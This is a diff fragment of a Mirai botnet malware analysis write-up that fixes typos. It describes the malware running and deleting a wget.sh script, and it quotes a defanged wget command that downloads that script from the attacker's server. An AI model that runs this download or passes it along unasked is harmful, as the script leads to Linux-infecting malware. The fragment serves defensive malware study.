NocteDefensor/MiraiBotNetAnalysis/Anatomy-of-An-Mirai-Botnet-Attack.md

 - We then see it use sh to execute wget.sh and it follows it all up by deleting itself.

-### Whats in wget.sh?
+### What's in wget.sh?

 - To find this out we need to fire up a VM (behind a VPN) and wget this wget.sh script from the attacker webserver.
     - To that end we can just run the same command (defanged of course)
-    - Becareful from here on out.
+    - Be careful from here on out.
 The ELF we eventually will grab can infect linux machines.
 Only  do this on a machine you can blow up and walk away from or reset.
 ```
 wget http://23.94.22[.]13/a/wget.sh
 ```